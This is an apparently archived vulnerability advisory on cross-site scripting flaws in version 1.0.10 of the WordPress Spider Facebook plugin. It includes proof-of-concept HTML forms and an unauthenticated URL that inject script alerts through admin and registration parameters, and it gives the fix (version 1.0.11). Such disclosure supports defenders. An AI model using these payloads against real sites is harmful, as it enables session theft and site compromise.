WordPress Spider Facebook 1.0.10 Cross Site Scripting

WordPress Spider Facebook 1.0.10 Cross Site Scripting: Posted Feb 9, 2015; Authored by Morten Nortoft, Kenneth Jepsen, Mikkel Vej; WordPress Spider Facebook plugin version 1.0.10 suffers from multiple cross site scripting vulnerabilities.; tags | exploit, vulnerability, xss; SHA-256 | 05c4987140e7f12d38505e7a14c7e9256274ef46f188e1ab56081077a84daa69; Download | Favorite | View

WordPress Spider Facebook 1.0.10 Cross Site Scripting

Title: WordPress 'WordPress Facebook' plugin - XSS
Version: 1.0.10
Author: Morten Nørtoft, Kenneth Jepsen, Mikkel Vej
Date: 2015/01/26
Download: https://wordpress.org/plugins/spider-facebook/
Contacted WordPress: 2015/01/26
==========================================================

## Description: 
==========================================================
Spider Facebook is a WordPress integration tool for Facebook.It includes all the available Facebook social plugins and widgets to be added to your web

## XSS:
==========================================================
Some parameters are shown unsanitized, making XSS possible.

PoC:
Log in as admin an submit one of the following forms:
<form method="POST" action="http://[URL]/wp-admin/admin.php?page=Spider_Facebook_manage"> 
   <input type="text" name="asc_or_desc" value=""/><script>alert(1)</script>"><br />
  <input type="text" name="order_by" value=""/><script>alert(2)</script>"><br />
  <input type="text" name="page_number" value=""/><script>alert(3)</script>"><br />
  <input type="text" name="serch_or_not" value=""/><script>alert(4)</script>"><br />
  <input type="submit">
</form>

<form method="POST" action="http://[URL]/wp-admin/admin-ajax.php?action=selectpagesforfacebook&"> 
   <input type="text" name="search_events_by_title" value=""/><script>alert(1)</script>"><br />
  <input type="text" name="page_number" value=""/><script>alert(2)</script>"><br />
  <input type="text" name="serch_or_not" value=""/><script>alert(3)</script>"><br />
  <input type="text" name="asc_or_desc" value=""/><script>alert(5)</script>"><br />
  <input type="text" name="order_by" value=""/><script>alert(6)</script>"><br />
  <input type="submit">
</form>
Also works with this target url: http://[URL]/wp-admin/admin-ajax.php?action=selectpostsforfacebook&

<form method="POST" action="http://[URL]/wp-admin/admin.php?page=Spider_Facebook_manage"> 
   <input type="text" name="search_events_by_title" value=""/><script>alert(1)</script>"><br />
  <input type="text" name="serch_or_not" value="search" READONLY><br />
  <input type="submit">
</form>
Also works with http://[URL]/wp-admin/admin-ajax.php?action=selectpostsforfacebook& and http://[URL]/wp-admin/admin-ajax.php?action=selectpagesforfacebook&

You can also just visit the following URL (no login required):
http://[URL]/?task=registration&g_red=1&type=auto&appid=%22%3E%3C/iframe%3E%3Cscript%3Ealert%281%29%3C/script%3E

## Solution
==========================================================
Update to version 1.0.11

Top Authors In Last 30 Days

Red Hat 172 files
Ubuntu 47 files
Debian 22 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
tmrswrr 4 files
E1.Coders 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

WordPress Spider Facebook 1.0.10 Cross Site Scripting

WordPress Spider Facebook 1.0.10 Cross Site Scripting

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

WordPress Spider Facebook 1.0.10 Cross Site Scripting

Share This

WordPress Spider Facebook 1.0.10 Cross Site Scripting

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems